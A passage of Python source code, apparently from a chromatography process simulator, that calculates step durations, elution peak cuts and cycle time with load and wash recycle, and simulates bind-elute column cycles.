self.equilibration_cv,
eq_f)
else:
# Duration.
self._equilibration_t = max(self.equilibration_t, 0)
# Log.
self.log.i_data(self._log_tree,
'equilibration_t',
self._equilibration_t)
def _calc_wash_t_and_f(self):
"""Determine wash step flow rate and duration."""
# Flow rate.
self._wash_f = self._get_flow_value("Wash",
"wash_f",
self.wash_f,
self.wash_f_rel)
# Duration.
self._wash_t = self._get_time_value("Wash",
"wash_t",
self.wash_t,
self.wash_cv,
self._wash_f)
def _calc_elution_t_and_f(self):
"""Determine elution step flow rate and duration."""
# Flow rate.
self._elution_f = self._get_flow_value("Elution",
"elution_f",
self.elution_f,
self.elution_f_rel)
# Duration.
self._elution_t = self._get_time_value("Elution",
"elution_t",
self.elution_t,
self.elution_cv,
self._elution_f)
def _calc_elution_peak_t(self):
"""Determine elution peak mean position (1st momentum)."""
self._elution_peak_t = self._get_time_value(
"elution peak position",
"elution_peak_position_t",
self.elution_peak_position_t,
self.elution_peak_position_cv,
self._elution_f
)
def _update_elution_peak_pdf(self):
"""Update elution peak PDF."""
assert self._elution_peak_t > 0
assert self._elution_f > 0
# Calc elution peak shape.
self.elution_peak_shape.update_pdf(
rt_mean=self._elution_peak_t,
v_void=self._elution_peak_t * self._elution_f,
f=self._elution_f
)
self._p_elution_peak = \
self.elution_peak_shape.get_p() * (1 - self.unaccounted_losses_rel)
self.log.d_data(self._log_tree,
"p_elution_peak",
self._p_elution_peak)
def _calc_elution_peak_cut_i_start_and_i_end(self):
"""Calc elution peak cut start and end in form of time steps.
Values are relative to the beginning of the elution step.
"""
elution_peak_pdf: _np.ndarray = self._p_elution_peak.copy()
# Peak cut start.
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.WARNING,
elution_peak_cut_start_peak_area_share=self
.elution_peak_cut_start_peak_area_share,
elution_peak_cut_start_c_rel_to_peak_max=self
.elution_peak_cut_start_c_rel_to_peak_max,
elution_peak_cut_start_cv=self.elution_peak_cut_start_cv,
elution_peak_cut_start_t=self.elution_peak_cut_start_t
)
# Calc `elution_peak_cut_start_i`.
if self.elution_peak_cut_start_peak_area_share >= 0:
elution_peak_cut_start_i = _utils.vectors.true_start(
_np.cumsum(elution_peak_pdf * self._dt)
>= self.elution_peak_cut_start_peak_area_share
)
elif self.elution_peak_cut_start_c_rel_to_peak_max >= 0:
elution_peak_cut_start_i = _utils.vectors.true_start(
elution_peak_pdf
>= self.elution_peak_cut_start_c_rel_to_peak_max
* elution_peak_pdf.max()
)
elif self.elution_peak_cut_start_cv >= 0:
elution_peak_cut_start_i = \
int(self.elution_peak_cut_start_cv
* self._cv / self._elution_f / self._dt)
elif self.elution_peak_cut_start_t >= 0:
elution_peak_cut_start_i = \
int(self.elution_peak_cut_start_t / self._dt)
else:
self.log.w(f"Elution peak cut start is not defined."
f" Now collecting from the beginning"
f" of the elution phase.")
elution_peak_cut_start_i = 0
# Log.
self.log.i_data(self._log_tree,
"elution_peak_cut_start_i",
elution_peak_cut_start_i)
self.log.i_data(self._log_tree,
"elution_peak_cut_start_t",
elution_peak_cut_start_i * self._dt)
# Peak cut end.
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.WARNING,
elution_peak_cut_end_peak_area_share=self
.elution_peak_cut_end_peak_area_share,
elution_peak_cut_end_c_rel_to_peak_max=self
.elution_peak_cut_end_c_rel_to_peak_max,
elution_peak_cut_end_cv=self.elution_peak_cut_end_cv,
elution_peak_cut_end_t=self.elution_peak_cut_end_t,
)
# Calc `elution_peak_cut_end_i`.
if self.elution_peak_cut_end_peak_area_share >= 0:
elution_peak_cut_end_i = _utils.vectors.true_start(
_np.cumsum(elution_peak_pdf * self._dt)
>= (1 - self.elution_peak_cut_end_peak_area_share)
)
elif self.elution_peak_cut_end_c_rel_to_peak_max >= 0:
elution_peak_cut_end_i = _utils.vectors.true_end(
elution_peak_pdf
>= self.elution_peak_cut_end_c_rel_to_peak_max
* elution_peak_pdf.max()
)
elif self.elution_peak_cut_end_cv >= 0:
elution_peak_cut_end_i = \
int(self.elution_peak_cut_end_cv
* self._cv / self._elution_f / self._dt)
elif self.elution_peak_cut_end_t >= 0:
elution_peak_cut_end_i = \
_utils.vectors.true_end(self._t < self.elution_peak_cut_end_t)
else:
self.log.w(f"Elution peak cut end is not defined."
f" Now collecting to the end of the elution phase.")
elution_peak_cut_end_i = elution_peak_pdf.size
self._elution_peak_cut_start_i = elution_peak_cut_start_i
self._elution_peak_cut_end_i = elution_peak_cut_end_i
# Log.
self.log.i_data(self._log_tree,
"elution_peak_cut_end_i",
elution_peak_cut_end_i)
self.log.i_data(self._log_tree,
"elution_peak_cut_end_t",
elution_peak_cut_end_i * self._dt)
if self._elution_peak_cut_end_i * self._dt < self._elution_peak_t:
self.log.w(f"Peak end is cut before its maximum.")
if self._elution_peak_cut_end_i * self._dt > self._elution_t:
self.log.w(f"Peak cut end exceeds elution step duration.")
def _calc_elution_peak_mask(self):
"""Calc where the elution peak gets collected."""
self._elution_peak_mask = \
_np.ones(int(round(self._elution_t / self._dt)), dtype=bool)
self._elution_peak_mask[self._elution_peak_cut_end_i:] = False
self._elution_peak_mask[:self._elution_peak_cut_start_i] = False
self.log.d_data(self._log_tree,
"elution_peak_interval",
self._elution_peak_mask)
def _update_load_btc(self):
"""Update load breakthrough profile."""
assert self._cv > 0, "CV must be defined by now."
self.load_bt.update_btc_parameters(cv=self._cv)
def _calc_regeneration_t(self):
"""Calc regeneration step duration."""
if self.regeneration_cv > 0:
eq_f = self._get_flow_value("Regeneration",
"regeneration_f",
self.regeneration_f,
self.regeneration_f_rel)
self._regeneration_t = self._get_time_value("Regeneration",
"regeneration_t",
self.regeneration_t,
self.regeneration_cv,
eq_f)
else:
self._regeneration_t = max(self.regeneration_t, 0)
# Log.
self.log.i_data(self._log_tree, 'regeneration_t', self._regeneration_t)
def _update_load_recycle_pdf(self, flow):
"""Update pdf that describes propagation of recycled material.
Recycled material is composed of unbound (load) and desorbed
(wash) material throughout the column.
`self.load_recycle_pdf` gets updated.
"""
assert self.load_recycle_pdf is not None, \
f"`load_recycle_pdf` must be defined by now."
assert self.column_porosity_retentate > 0, \
f"Retentate porosity must be defined by now."
assert self._cv > 0, "CV must be defined by now."
v_void = self._cv * self.column_porosity_retentate
self.load_recycle_pdf.update_pdf(v_void=v_void,
f=flow,
rt_mean=v_void / flow)
self._p_load_recycle_pdf = self.load_recycle_pdf.get_p()
def _calc_load_recycle_wash_i(self):
"""Calculate wash recycle duration in form of time steps."""
if self.wash_recycle_duration_t > 0 \
or self.wash_recycle_duration_cv > 0:
self._wash_recycle_i_duration = int(self._get_time_value(
"Wash recycle", "load_wash_recycle_t",
self.wash_recycle_duration_t,
self.wash_recycle_duration_cv,
self._wash_f
) / self._dt)
else:
# Same as wash duration.
assert self._wash_t > 0
self._wash_recycle_i_duration = int(round(self._wash_t / self._dt))
def _get_load_bt_cycle_switch_criteria(self,
load_c_ss: _np.ndarray
) -> _np.ndarray:
"""Get steady-state cycle switch (== end of load) criteria.
Parameters
----------
load_c_ss
Load concentration during steady state operation.
Returns
-------
ndarray
Threshold concentration for load breakthrough.
"""
assert self.load_c_end_ss is not None \
or self.load_c_end_relative_ss > 0, \
f"Load step duration should be defined!"
if self.load_c_end_ss is not None:
load_c_end_ss = self.load_c_end_ss
if self.load_c_end_relative_ss > 0:
self.log.w(f"Cycle time defined by `load_c_end_ss`"
f" and `load_c_end_relative_ss`."
f" Simulation is using `load_c_end_ss`.")
else: # self.load_c_end_relative_ss > 0
load_c_end_ss = self.load_c_end_relative_ss * load_c_ss
# Log.
self.log.i_data(self._log_tree,
'load_c_end_ss',
load_c_end_ss)
return load_c_end_ss
# noinspection DuplicatedCode
def _calc_cycle_t(self):
"""Calculates cycle time (== load time for a single column).
Optional delay of first cycle is not part of this calculation.
"""
assert self._cv > 0
assert self._load_f > 0
if self.load_cv > 0:
t_cycle = self.load_cv * self._cv / self._load_f
if self.load_c_end_ss is not None \
or self.load_c_end_relative_ss > 0:
self.log.w(f"Cycle time defined in more than one way."
f" Simulation is using `load_cv`.")
else:
# Get bt profile for constant inlet.
# Inlet conc.
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
load_c_ss = self._estimate_steady_state_mean_c(binding_species)
# Simulate first cycle at constant load concentration.
f_first_load = self._load_f * _np.ones(self._t.size)
c_first_load = load_c_ss * _np.ones([len(binding_species),
self._t.size])
bt_first_load: _np.ndarray = \
load_c_ss - self.load_bt.calc_c_bound(f_first_load,
c_first_load)
# Propagate breakthrough.
bt_first_load_out, bt_first_wash_out = \
self._sim_c_recycle_propagation(f_first_load,
bt_first_load,
None)
# Calc cycle duration.
load_c_end_ss = self._get_load_bt_cycle_switch_criteria(load_c_ss)
# noinspection PyTypeChecker
i_t_first_cycle = _utils.vectors.true_start(
bt_first_load_out.sum(0) >= load_c_end_ss.sum())
t_cycle = i_t_first_cycle * self._dt
# Wash desorption.
if self.wash_desorption and self.wash_recycle:
c_wash_desorbed = self._sim_c_wash_desorption(
f_first_load[:i_t_first_cycle],
c_first_load[:, :i_t_first_cycle]
- bt_first_load[:, :i_t_first_cycle])
else:
c_wash_desorbed = None
bt_first_load_out, bt_first_wash_out = \
self._sim_c_recycle_propagation(
f_first_load[:i_t_first_cycle],
bt_first_load[:, :i_t_first_cycle],
c_wash_desorbed)
if self.load_recycle:
if not self.load_c_end_estimate_with_iterative_solver:
self.log.w(f"Estimating cycle duration:"
f" Assuming sharp breakthrough profile.")
i_load_recycle_start = self._wash_recycle_i_duration \
if self.wash_recycle else 0
m_load_recycle = \
bt_first_load_out[
:,
i_load_recycle_start:i_t_first_cycle
].sum() * self._load_f * self._dt
_t_diff = m_load_recycle / self._load_f / load_c_ss.sum()
t_cycle -= _t_diff
self._load_recycle_m_ss = m_load_recycle
self.log.i_data(self._log_tree,
'm_load_recycle_ss',
m_load_recycle)
self.log.i_data(self._log_tree,
'shorten_cycle_t_due_to_bt_recycle',
_t_diff)
if self.wash_recycle:
if not self.load_c_end_estimate_with_iterative_solver:
self.log.w(f"Estimating cycle duration:"
f" Assuming sharp breakthrough profile.")
m_wash_recycle = bt_first_wash_out[
:,
:self._wash_recycle_i_duration
].sum() * self._wash_f * self._dt
_t_diff = m_wash_recycle / self._load_f / load_c_ss.sum()
t_cycle -= _t_diff
self._wash_recycle_m_ss = m_wash_recycle
self.log.i_data(self._log_tree,
'm_wash_recycle_ss',
m_wash_recycle)
self.log.i_data(self._log_tree,
'shorten_cycle_t_due_to_wash_recycle',
_t_diff)
if self.load_c_end_estimate_with_iterative_solver \
and (self.wash_recycle or self.load_recycle):
c_load_fist_cycle = load_c_ss * _np.ones([len(binding_species),
i_t_first_cycle * 2])
def sim_cycle(f_load: _np.ndarray,
c_load: _np.ndarray,
i_prev_cycle: int) -> _typing.Tuple[_np.ndarray,
_np.ndarray,
int]:
"""Simulates load-wash cycle. Calc load duration.
Load duration is determined based on breakthrough
criteria.
Parameters
----------
f_load
Load flow rate profile.
c_load
Load conc profile.
i_prev_cycle
Previous cycle duration in time steps.
Returns
-------
f_load_next_cycle
Load and wash breakthrough flow rate profile.
c_load_next_cycle
Load and wash breakthrough conc profile.
i_cycle
Current cycle duration in time steps.
"""
# Load.
bt_load: _np.ndarray = \
c_load - self.load_bt.calc_c_bound(f_load, c_load)
# Propagate breakthrough.
bt_load_out, _ = self._sim_c_recycle_propagation(
f_load,
bt_load,
None)
# 'Stop' load at specified breakthrough criteria.
# noinspection PyTypeChecker
i_cycle_duration = _utils.vectors.true_start(
bt_load_out.sum(0) >= load_c_end_ss.sum())
# Cut load at specified time.
bt_load = bt_load[:, :i_cycle_duration]
# Wash desorption.
if self.wash_desorption and self.wash_recycle:
c_first_wash_desorbed = self._sim_c_wash_desorption(
f_load[:i_cycle_duration],
c_load[:, :i_cycle_duration]
- bt_load[:, :i_cycle_duration])
else:
c_first_wash_desorbed = None
# Propagate load and wash leftovers.
bt_load_out, bt_wash_out = self._sim_c_recycle_propagation(
f_load[:i_cycle_duration],
bt_load,
c_first_wash_desorbed)
# Construct load for next cycle.
# Recycle load.
if self.load_recycle:
rec_load = bt_load_out[:,
i_prev_cycle:i_cycle_duration]
else:
rec_load = _np.zeros_like(
bt_load_out[:, i_prev_cycle:i_cycle_duration])
# Next load profiles.
c_next_load = _np.concatenate((rec_load,
c_load_fist_cycle),
axis=1)
f_next_load = self._load_f * _np.ones(c_next_load.shape[1])
wash_recycle_i_duration = self._wash_recycle_i_duration \
if self.wash_recycle else 0
# Log.
m_load_recycle_ss = \
bt_first_load_out[
:,
wash_recycle_i_duration:i_t_first_cycle
].sum() * self._load_f * self._dt
self._load_recycle_m_ss = m_load_recycle_ss
self.log.i_data(self._log_tree,
'm_load_recycle_ss',
m_load_recycle_ss)
# Recycle wash.
if self.wash_recycle:
c_next_load[:, :self._wash_recycle_i_duration] = \
bt_wash_out[:, :self._wash_recycle_i_duration]
f_next_load[:self._wash_recycle_i_duration] = \
self._wash_f
m_wash_recycle_ss = \
bt_wash_out[:,
:self._wash_recycle_i_duration
].sum() * self._wash_f * self._dt
self._wash_recycle_m_ss = m_wash_recycle_ss
self.log.i_data(self._log_tree,
'm_wash_recycle_ss',
m_wash_recycle_ss)
# Return next load and cycle duration.
return f_next_load, c_next_load, \
i_cycle_duration - i_prev_cycle
f_load_cycle = \
self._load_f * _np.ones(c_load_fist_cycle.shape[1])
c_load_cycle = c_load_fist_cycle
i_t_cycle_prev = i_t_first_cycle
i_t_cycle_estimate = 0
# Loop until cycle duration converges.
for i in range(
self.load_c_end_estimate_with_iter_solver_max_iter):
if abs(i_t_cycle_prev - i_t_cycle_estimate) <= 1:
self.log.i_data(self._log_tree,
"t_cycle_optimization_loop_iter",
i)
break
i_t_cycle_prev = i_t_cycle_estimate
f_load_cycle, c_load_cycle, i_t_cycle_estimate = \
sim_cycle(f_load_cycle, c_load_cycle, i_t_cycle_prev)
# print([i, i_t_cycle_prev, i_t_cycle_estimate])
if abs(i_t_cycle_prev - i_t_cycle_estimate) > 1:
self.log.w("Cycle duration estimator did not converge.")
t_cycle = i_t_cycle_estimate * self._dt
elif self.load_c_end_estimate_with_iterative_solver:
self.log.i(f"No need to use iterative solver in case of"
f" no recycling of load and/or wash.")
self._cycle_t = t_cycle
self.log.i_data(self._log_tree, 'cycle_t', t_cycle)
# noinspection DuplicatedCode
def _calc_first_cycle_extension_t(self):
"""Calc extension of first load.
First load step might be extended for processes with load and/or
wash recycle in order to get faster into steady-state regime.
"""
if not self.load_recycle and not self.wash_recycle:
self.log.w(f"Estimation of first cycle extension requested"
f" on a process without load recycle.")
self._first_cycle_extension_t = 0
return
elif not self.load_extend_first_cycle:
self.log.w(f"Estimation of first cycle extension requested"
f" on a process without extended first cycle.")
self._first_cycle_extension_t = 0
return
elif self.load_extend_first_cycle_t > 0:
self._first_cycle_extension_t = self.load_extend_first_cycle_t
return
elif self.load_extend_first_cycle_cv >= 0:
assert self._cv > 0, "CV should be defined by now."
assert self._load_f > 0, "Load flow rate should be defined by now."
self._first_cycle_extension_t = \
self.load_extend_first_cycle_cv * self._cv / self._load_f
elif self.load_cv > 0:
raise NotImplementedError(
f"Estimation of first cycle extension is only supported"
f" if the cycle length is defined by breakthrough cutoff"
f" criteria. This is due to the fact that if all the"
f" breakthrough material gets recycles,"
f" there is no single steady-state.")
else:
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
load_c_ss = self._estimate_steady_state_mean_c(binding_species)
# simulate first cycle at constant load concentration
f_first_load = self._load_f * _np.ones(self._t.size)
c_first_load = load_c_ss * _np.ones([len(binding_species),
self._t.size])
bt_first_load: _np.ndarray = \
load_c_ss - self.load_bt.calc_c_bound(f_first_load,
c_first_load)
# propagate breakthrough
bt_first_load_out, _ = \
self._sim_c_recycle_propagation(f_first_load,
bt_first_load,
None)
load_c_end_ss = self._get_load_bt_cycle_switch_criteria(load_c_ss)
# noinspection PyTypeChecker
i_t_first_cycle = _utils.vectors.true_start(
bt_first_load_out.sum(0) >= load_c_end_ss.sum())
dm = 0
if self.load_recycle:
assert hasattr(self, "_load_recycle_m_ss"), \
f"Function `_calc_cycle_t()` should already be called."
dm += self._load_recycle_m_ss
if self.wash_recycle:
assert hasattr(self, "_wash_recycle_m_ss"), \
f"Function `_calc_cycle_t()` should already be called."
dm += self._wash_recycle_m_ss
di = 0
if dm > 0:
m_ext_bt = _np.cumsum(
bt_first_load_out.sum(0)[i_t_first_cycle:]
) * self._load_f * self._dt
di += _utils.vectors.true_start(m_ext_bt >= dm)
self._first_cycle_extension_t = di * self._dt
def _calc_cycle_start_i_list(self):
"""Calculate load switch positions in form of time steps."""
assert self._cycle_t > 0, \
f"Cycle length must have been determined" \
f" (by `_calc_cycle_t()`) by now"
flow_i_start, flow_i_end = \
_utils.vectors.true_start_and_end(self._f > 0)
if self.load_extend_first_cycle:
assert self._first_cycle_extension_t >= 0, \
f"Prolong of first load cycle is set to `True`," \
f" but the length is undefined."
if self._first_cycle_extension_t == 0:
self.log.w(f"Prolong of first load cycle is set to `True`,"
f" but the length of the extension is 0.")
load_extend_first_cycle_t = self._first_cycle_extension_t
self.log.i_data(self._log_tree,
"load_extend_first_cycle_t",
load_extend_first_cycle_t)
else:
load_extend_first_cycle_t = 0
cycle_start_t_list = _np.arange(
self._t[flow_i_start] + load_extend_first_cycle_t,
self._t[flow_i_end - 1],
self._cycle_t
)
cycle_start_t_list[0] = self._t[flow_i_start]
self._cycle_start_i_list = _np.rint(
cycle_start_t_list / self._dt).astype(_np.int32)
self.log.i_data(self._log_tree,
"cycle_start_t_list",
cycle_start_t_list)
def _prepare_simulation(self):
"""Prepare everything before cycle-by-cycle simulation."""
self._assert_non_binding_species()
self._calc_load_f()
self._calc_cv() # might depend on load_f
self._report_column_dimensions() # optional
# Equilibration.
self._calc_equilibration_t()
# Wash.
self._calc_wash_t_and_f()
# Elution.
self._calc_elution_t_and_f()
self._calc_elution_peak_t()
self._update_elution_peak_pdf()
self._calc_elution_peak_cut_i_start_and_i_end()
self._calc_elution_peak_mask()
# Regeneration.
self._calc_regeneration_t()
# Prepare for estimation of cycle length.
self._update_load_btc()
if self.load_recycle:
self._update_load_recycle_pdf(self._wash_f)
if self.wash_recycle:
self._calc_load_recycle_wash_i()
# Cycle time.
self._calc_cycle_t()
if self.load_extend_first_cycle:
self._calc_first_cycle_extension_t()
# Cycle start positions == column load switch time points.
self._calc_cycle_start_i_list()
# Make sure cycle duration is long enough.
_t_cycle_except_load = self._equilibration_t + self._wash_t \
+ self._elution_t + self._regeneration_t
if self._cycle_t < _t_cycle_except_load:
self.log.e(f"Load step ({self._cycle_t}) should not be shorter"
f" than eq_t + wash_t + elution_t + regeneration_t"
f" ({_t_cycle_except_load: .6})!")
def _sim_c_load_binding(self,
f_load: _np.ndarray,
c_load: _np.ndarray
) -> _typing.Tuple[_np.ndarray, _np.ndarray]:
"""Determine what part of load binds.
Load in this context might also contain wash and load recycle
from previous steps.
Parameters
----------
f_load
Load flow rate profile.
c_load
Load concentration profile.
Returns
-------
c_bound
Conc profile of bound material.
c_unbound
Conc profile of unbound material = `c_load` - `c_bound`.
"""
assert f_load.size == c_load.shape[1], \
"f_load and c_load must have the same length"
assert c_load.shape[0] == \
self._n_species - len(self.non_binding_species), \
"c_load must contain all binding species"
c_bound = self.load_bt.calc_c_bound(f_load, c_load)
# Returns bound and unbound part.
return c_bound, c_load - c_bound
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Get conc profile of desorbed material during wash step.
The step has no default logic.
Thus it raises `NotImplementedError` if called.
Parameters
----------
f_load
Flow rate profile during 'effective load' step.
The step includes wash recycle, load recycle and load step
as a column sees it in a single cycle.
c_bound
Conc profile of captured material.
Returns
-------
ndarray
Conc profile of desorbed material during wash step.
Raises
------
NotImplementedError
This method has no default implementation, so calling it
raises this error.
"""
# Not implemented in this base class, as there is
# no consensus on typical dynamics and the way to describe it.
raise NotImplementedError("Function not implemented in this class")
def _sim_c_recycle_propagation(
self,
f_unbound: _np.ndarray,
c_unbound: _np.ndarray,
c_wash_desorbed: _typing.Optional[_np.ndarray]
) -> _typing.Tuple[_np.ndarray, _np.ndarray]:
"""Propagate unbound and desorbed material through the column.
Unbound (breakthrough during load) and desorbed (during wash)
sections might have a different flow rates as they come from
different steps - load and wash.
Parameters
----------
f_unbound
Flow rate profile during 'total load' step for a cycle.
The step includes wash recycle, load recycle and load step.
c_unbound
Conc profile of overloaded material during load step
(plus previous wash and load recycle).
c_wash_desorbed
Conc profile of desorbed material during wash step.
Returns
-------
c_unbound_propagated
Propagated conc profile of overloaded material.
c_wash_desorbed_propagated
Propagated conc profile of desorbed material.
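Notes
-----
Load and wash sections are first merged on a common volumetric grid
(step = `dt` * min(load flow, wash flow)), convolved with
:attr:`load_recycle_pdf`, and then split back onto their respective
time grids.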
"""
assert hasattr(self, "_wash_f") and self._wash_f > 0
assert hasattr(self, "_wash_t") and self._wash_t > 0
assert self.load_recycle_pdf is not None
assert c_unbound.shape[0] == \
self._n_species - len(self.non_binding_species)
assert c_unbound.shape[1] == f_unbound.size
if c_wash_desorbed is None or c_wash_desorbed.size == 0:
c_wash_desorbed = _np.zeros([
self._n_species - len(self.non_binding_species),
int(round(self._wash_t / self._dt))])
else:
assert c_wash_desorbed.shape[0] == \
self._n_species - len(self.non_binding_species)
assert c_wash_desorbed.shape[1] == \
int(round(self._wash_t / self._dt))
# Combine on volumetric scale.
v_load = self._dt * f_unbound.cumsum()
v_wash = v_load[-1] + \
self._dt * _np.arange(1, c_wash_desorbed.shape[1] + 1) \
* self._wash_f
min_flow = min(f_unbound.min(), self._wash_f)
dv = min_flow * self._dt
v = _np.arange(dv,
(v_wash[-1] if v_wash.size > 0 else v_load[-1]) + dv,
dv)
c_v_combined = _interp.interp1d(
_np.concatenate((v_load, v_wash), axis=0),
_np.concatenate((c_unbound, c_wash_desorbed), axis=1),
fill_value="extrapolate"
)(v)
c_v_combined[c_v_combined < 0] = 0
# Simulate traveling of leftover material through the column.
self._update_load_recycle_pdf(min_flow)
c_v_combined_propagated = _utils.convolution.time_conv(
self._dt, c_v_combined, self._p_load_recycle_pdf)
# Split back on time scale.
c_combined_propagated = _interp.interp1d(
v,
c_v_combined_propagated,
fill_value="extrapolate"
)(_np.concatenate((v_load, v_wash), axis=0))
c_combined_propagated[c_combined_propagated < 0] = 0
c_unbound_propagated = c_combined_propagated[:, :v_load.size]
c_wash_desorbed_propagated = c_combined_propagated[:, v_load.size:]
return c_unbound_propagated, c_wash_desorbed_propagated
def _sim_c_elution_desorption(self,
m_bound: _np.ndarray
) -> _typing.Tuple[_np.ndarray,
_np.ndarray]:
"""Simulate elution step.
Parameters
----------
m_bound
Vector with amount of product being bound to the column.
`m_bound.size == n_species`
Returns
-------
c_elution
Outlet concentration profile during the elution.
b_elution_peak
Boolean vector. Peak is collected where the value is `True`.
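Notes
-----
The outlet profile is the loss-adjusted elution peak PDF scaled by the
bound mass of each species, `c_elution[i, :] = p_peak * m_bound[i]
/ elution_f`, so integrating it over time and multiplying by the
elution flow rate recovers `m_bound[i]` (less unaccounted losses).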
"""
assert self._elution_f > 0
assert self._elution_t > 0
i_elution_duration = int(round(self._elution_t / self._dt))
# Multiply elution peak with the amount of captured product.
c_elution = \
self._p_elution_peak[_np.newaxis, :i_elution_duration] * \
m_bound[:, _np.newaxis] / self._elution_f
# Pad with zeros to cover the entire elution step duration.
if c_elution.shape[1] < i_elution_duration:
c_elution = _np.pad(c_elution,
((0, 0),
(0, i_elution_duration - c_elution.shape[1])),
mode="constant")
# Boolean mask - `True` where peak is being collected.
b_elution_peak = self._elution_peak_mask
return c_elution, b_elution_peak
def _sim_c_elution_buffer(self, n_time_steps: int) -> _np.ndarray:
"""Get elution buffer composition at the outlet of the column.
By default the buffer composition is constant throughout the
elution step.
Feel free to override this function if you want to simulate
linear gradient or if the transient phenomena at the beginning
of peak cut needs to be considered.
Parameters
----------
n_time_steps
Duration of elution step in number of time steps.
Returns
-------
ndarray
Buffer concentration profile at the outlet of the column
during the elution step.
"""
# Elution buffer composition.
elution_buffer_composition = \
self.elution_buffer_c.reshape(self.elution_buffer_c.size, 1)
assert elution_buffer_composition.size == 0 \
or elution_buffer_composition.size == self._n_species, \
f"Elution buffer composition must be either empty or have" \
f" a concentration value for each specie."
assert _np.all(elution_buffer_composition >= 0), \
"Concentration values in elution buffer must be >= 0"
if elution_buffer_composition.size == 0:
elution_buffer_composition = _np.zeros([self._n_species, 1])
self.log.i_data(self._log_tree,
"elution_buffer_composition",
elution_buffer_composition)
# Constant profile.
c_elution_buffer = elution_buffer_composition \
* _np.ones_like(self._t[:n_time_steps])
return c_elution_buffer
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def _sim_c_regeneration(self,
m_bound: _np.ndarray
) -> _typing.Optional[_np.ndarray]:
"""Simulate regeneration step.
Parameters
----------
m_bound
Vector with amount of product being bound to the column at
the beginning of the regeneration step.
`m_bound.size == n_species`.
Returns
-------
Optional[ndarray]
Outlet concentration profile during regeneration step.
E.g. regeneration peak.
"""
# No default implementation.
c_regeneration = None
return c_regeneration
def _sim_c_out_cycle(self,
f_load: _np.ndarray,
c_load: _np.ndarray
) -> _typing.Tuple[_typing.Optional[_np.ndarray],
_typing.Optional[_np.ndarray],
_np.ndarray,
_np.ndarray,
_typing.Optional[_np.ndarray]]:
"""Simulates load-wash-elution-regeneration steps.
Regeneration is optional.
This function can be replaced in case user wants to use some
other variation of bind-elution dynamics.
Elution peak cut is applied in this function.
Elution peak shape must be defined by now.
Returned profiles that are `None` are treated as zero.
Parameters
----------
f_load
Inlet (recycle + load) flow rate profile for a cycle.
The flow rate might be different during wash recycle.
c_load
Inlet (recycle + load) concentration profile.
Returns
-------
c_load
Conc profile at the outlet of the column during load.
c_wash
Conc profile at the outlet of the column during wash.
c_elution
Conc profile at the outlet of the column during elution.
b_elution
Boolean mask for elution step. `True` where peak is being
collected.
c_regeneration
Conc profile at the outlet of the column during
regeneration.
"""
assert self._load_f > 0
assert self._wash_f > 0
assert self._wash_t > 0
assert self._elution_f > 0
assert self._elution_t > 0
assert self._load_f > 0
assert self._cv > 0
# Evaluate binding.
c_bound, c_unbound = self._sim_c_load_binding(f_load, c_load)
# Log.
m_load = (c_load * f_load[_np.newaxis, :]).sum(1) * self._dt
m_bound = (c_bound * f_load[_np.newaxis, :]).sum(1) * self._dt
self.log.i_data(self._cycle_tree,
"column_utilization",
m_bound / self._cv / self.load_bt.get_total_bc())
self.log.i_data(self._cycle_tree, "m_load", m_load)
self.log.i_data(self._cycle_tree, "m_bound", m_bound)
self.log.i_data(self._cycle_tree, "m_unbound", m_load - m_bound)
self.log.d_data(self._cycle_tree, "f_load", f_load)
self.log.d_data(self._cycle_tree, "c_load", c_load)
self.log.d_data(self._cycle_tree, "c_bound", c_bound)
self.log.d_data(self._cycle_tree, "c_unbound", c_unbound)
# Evaluate desorption during wash.
c_wash_desorbed = None
if self.wash_desorption:
c_wash_desorbed = self._sim_c_wash_desorption(f_load, c_bound)
if c_wash_desorbed.size > 0:
# Subtract desorbed material from bound material.
m_bound -= c_wash_desorbed.sum(1)
# Log.
self.log.i_data(self._cycle_tree,
"m_wash_desorbed",
c_wash_desorbed.sum(1) * self._wash_f * self._dt)
self.log.d_data(self._cycle_tree,
"c_wash_desorbed",
c_wash_desorbed)
# Propagate unbound and desorbed material throughout the column.
c_out_load = c_unbound
c_out_wash = c_wash_desorbed
if self.load_recycle or self.wash_recycle:
c_out_load, c_out_wash = \
self._sim_c_recycle_propagation(f_load,
c_unbound,
c_wash_desorbed)
# Get elution peak.
c_out_elution, elution_peak_mask = \
self._sim_c_elution_desorption(m_bound)
# Log.
m_elution_peak = (c_out_elution * elution_peak_mask[_np.newaxis, :]
).sum(1) * self._elution_f * self._dt
m_elution = c_out_elution.sum(1) * self._elution_f * self._dt
self.log.i_data(self._cycle_tree,
"m_elution_peak", m_elution_peak)
self.log.i_data(self._cycle_tree,
"m_elution", m_elution)
self.log.i_data(self._cycle_tree,
"m_elution_peak_cut_loss", m_elution - m_elution_peak)
# Get regeneration peak.
c_out_regeneration = self._sim_c_regeneration(
m_bound - c_out_elution.sum(1) * self._elution_f * self._dt)
return c_out_load, c_out_wash, c_out_elution, \
elution_peak_mask, c_out_regeneration
def _calculate(self):
# Pre calculate parameters and repetitive profiles.
self._prepare_simulation()
# Assert proper list of binding species.
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
assert len(binding_species) > 0
# Copy inlet vectors.
c_in_load = self._c[binding_species].copy()
f_in_load = self._f.copy()
f_in_i_end = min(_utils.vectors.true_end(f_in_load > 0), self._t.size)
c_in_load[:, f_in_i_end:] = 0
# Clear for results.
self._c[:] = 0
self._f[:] = 0
# Prepare logger.
log_data_cycles = list()
self.log.set_branch(self._log_tree, "cycles", log_data_cycles)
# Variable to store wash recycle to.
previous_c_bt_wash: _typing.Optional[_np.ndarray] = None
# Loop across cycles.
for i in range(self._cycle_start_i_list.size):
# Load-wash-elution-regeneration-equilibration steps for a column.
# Load step starts at `self._cycle_start_i_list[i]`.
# Prepare logger for this cycle.
self._cycle_tree = dict()
log_data_cycles.append(self._cycle_tree)
# Load start and end time as the column sees it.
if i > 0 and self.load_recycle:
# Column sees leftovers from previous load during recycling.
cycle_load_i_start = self._cycle_start_i_list[i - 1]
else:
cycle_load_i_start = self._cycle_start_i_list[i]
# Calc cycle end (either next cycle start or end of simulation time).
if i + 1 < self._cycle_start_i_list.size:
cycle_load_i_end = self._cycle_start_i_list[i + 1]
else:
cycle_load_i_end = f_in_i_end - 1
# Log results.
